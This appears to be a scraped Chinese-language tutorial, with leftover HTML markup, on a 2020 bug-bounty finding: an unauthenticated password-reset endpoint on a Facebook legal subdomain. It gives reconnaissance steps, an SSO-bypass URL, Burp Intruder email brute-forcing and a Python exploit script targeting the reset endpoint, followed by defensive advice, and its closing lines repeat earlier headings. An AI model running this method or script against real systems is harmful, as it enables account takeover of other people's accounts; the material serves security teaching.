Facebook子域密码重置漏洞分析与利用教学<\/h1>

漏洞背景<\/h2>
本教学文档基于安全研究员Alaa在2020年发现的Facebook子域(legal.tapprd.thefacebook.com)密码重置漏洞。该漏洞允许攻击者未经授权重置任意用户密码，最终获得管理员权限。Facebook为此漏洞支付了7500美元的赏金。<\/p>

漏洞发现过程<\/h2>

目标选择<\/h3>

目标子域: https:\/\/legal.tapprd.thefacebook.com<\/code><\/li>
选择依据: 受到之前"HTML to PDF converter bug leads to RCE in Facebook server"报告的启发<\/li>

目标类型: 寻找远程代码执行(RCE)或类似高危漏洞<\/li>
<\/ul>
信息收集<\/h3>


目录枚举<\/strong>:<\/p>

使用fuzzing工具扫描子域目录结构<\/li>
发现多个返回403状态的目录，表明存在大量功能端点:
\/tapprd\/
\/tapprd\/content\/
\/tapprd\/services\/
\/tapprd\/Content\/
\/tapprd\/api\/
\/tapprd\/Services\/
\/tapprd\/temp\/
\/tapprd\/logs\/
...
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

JavaScript分析<\/strong>:<\/p>

仔细阅读网站JS文件以理解工作流程<\/li>
发现绕过SSO重定向的方法: https:\/\/legal.tapprd.thefacebook.com\/tapprd\/portal\/authentication\/login<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
关键漏洞点<\/h3>


密码重置端点<\/strong>:<\/p>

发现两个关键端点:

\/tapprd\/auth\/identity\/user\/forgotpassword<\/code><\/li>
\/savepassword<\/code> (POST请求)<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

漏洞本质<\/strong>:<\/p>

密码重置API对任何人开放，无身份验证<\/li>
相当于未授权访问端点<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用步骤<\/h2>
手动测试<\/h3>


尝试直接修改POST请求参数:<\/p>

包含CSRF令牌和新密码<\/li>
初始测试返回"执行此操作失败"错误<\/li>
<\/ul>
<\/li>

猜测需要有效邮箱地址:<\/p>

开始收集可能的邮箱列表<\/li>
使用Burp Intruder进行批量测试<\/li>
<\/ul>
<\/li>
<\/ol>
自动化测试<\/h3>


使用Burp Intruder:<\/p>

发送带有CSRF令牌和随机邮箱+新密码的请求到\/savepassword<\/code><\/li>
观察响应:

大多数返回错误<\/li>
部分返回302重定向到登录页面(成功标志)<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

验证成功:<\/p>

使用测试邮箱和新密码尝试登录<\/li>
成功进入管理面板<\/li>
<\/ul>
<\/li>
<\/ol>
影响扩大<\/h3>

Facebook员工使用工作账号登录该系统<\/li>
攻击者可获取Facebook工作账户访问令牌<\/li>
可能导致更广泛的Facebook内部系统访问<\/li>
<\/ul>
漏洞利用脚本<\/h2>
# 简单密码重置利用脚本示例<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>def<\/span> exploit_password_reset<\/span>(email, new_password):
<\/span><\/span>    # 获取CSRF令牌(需根据实际目标调整)<\/span>
<\/span><\/span>    csrf_token =<\/span> get_csrf_token()
<\/span><\/span>    
<\/span><\/span>    # 构造请求<\/span>
<\/span><\/span>    headers =<\/span> {
<\/span><\/span>        'User-Agent'<\/span>: 'Mozilla\/5.0'<\/span>,
<\/span><\/span>        'X-CSRF-Token'<\/span>: csrf_token
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    data =<\/span> {
<\/span><\/span>        'email'<\/span>: email,
<\/span><\/span>        'new_password'<\/span>: new_password,
<\/span><\/span>        'confirm_password'<\/span>: new_password
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    # 发送请求<\/span>
<\/span><\/span>    response =<\/span> requests.<\/span>post(
<\/span><\/span>        'https:\/\/legal.tapprd.thefacebook.com\/savepassword'<\/span>,
<\/span><\/span>        headers=<\/span>headers,
<\/span><\/span>        data=<\/span>data
<\/span><\/span>    )
<\/span><\/span>    
<\/span><\/span>    # 检查响应<\/span>
<\/span><\/span>    if<\/span> response.<\/span>status_code ==<\/span> 302<\/span>:
<\/span><\/span>        print(f<\/span>"[+] 密码重置成功! 现在可以使用 <\/span>{<\/span>email}<\/span>\/<\/span>{<\/span>new_password}<\/span> 登录"<\/span>)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print("[-] 密码重置失败"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> get_csrf_token<\/span>():
<\/span><\/span>    # 实现获取CSRF令牌的逻辑<\/span>
<\/span><\/span>    pass<\/span>
<\/span><\/span><\/code><\/pre>防御建议<\/h2>
对开发者的建议<\/h3>


身份验证<\/strong>:<\/p>

所有敏感操作(如密码重置)必须进行身份验证<\/li>
实现多因素认证机制<\/li>
<\/ul>
<\/li>

令牌验证<\/strong>:<\/p>

密码重置令牌应:

一次性使用<\/li>
有时效限制<\/li>
与特定用户会话绑定<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

速率限制<\/strong>:<\/p>

对密码重置请求实施速率限制<\/li>
防止暴力破解尝试<\/li>
<\/ul>
<\/li>

日志记录<\/strong>:<\/p>

记录所有密码重置尝试<\/li>
监控异常活动<\/li>
<\/ul>
<\/li>
<\/ol>
对安全测试人员的建议<\/h3>


API测试<\/strong>:<\/p>

重点关注未授权访问端点<\/li>
测试所有API的身份验证要求<\/li>
<\/ul>
<\/li>

密码重置流程测试<\/strong>:<\/p>

验证令牌是否可预测或重复使用<\/li>
检查是否可绕过身份验证<\/li>
<\/ul>
<\/li>

信息收集<\/strong>:<\/p>

彻底分析JS文件<\/li>
完整枚举应用程序端点<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
本案例展示了即使在大公司如Facebook的子系统中，也可能存在简单的认证绕过漏洞。关键在于:<\/p>

全面的信息收集<\/li>
仔细分析应用程序逻辑<\/li>
对看似小的漏洞点进行深入测试<\/li>
理解漏洞的潜在影响范围<\/li>
<\/ol>
这种类型的漏洞虽然技术复杂度不高，但由于其潜在的高影响(特别是涉及员工账户时)，通常能获得较高的漏洞赏金。<\/p>

Facebook子域密码重置漏洞分析与利用教学<\/h1>

漏洞背景<\/h2> 本教学文档基于安全研究员Alaa在2020年发现的Facebook子域(legal.tapprd.thefacebook.com)密码重置漏洞。该漏洞允许攻击者未经授权重置任意用户密码，最终获得管理员权限。Facebook为此漏洞支付了7500美元的赏金。<\/p>

漏洞发现过程<\/h2>

漏洞利用步骤<\/h2>

防御建议<\/h2>

漏洞背景<\/h2>
本教学文档基于安全研究员Alaa在2020年发现的Facebook子域(legal.tapprd.thefacebook.com)密码重置漏洞。该漏洞允许攻击者未经授权重置任意用户密码，最终获得管理员权限。Facebook为此漏洞支付了7500美元的赏金。<\/p>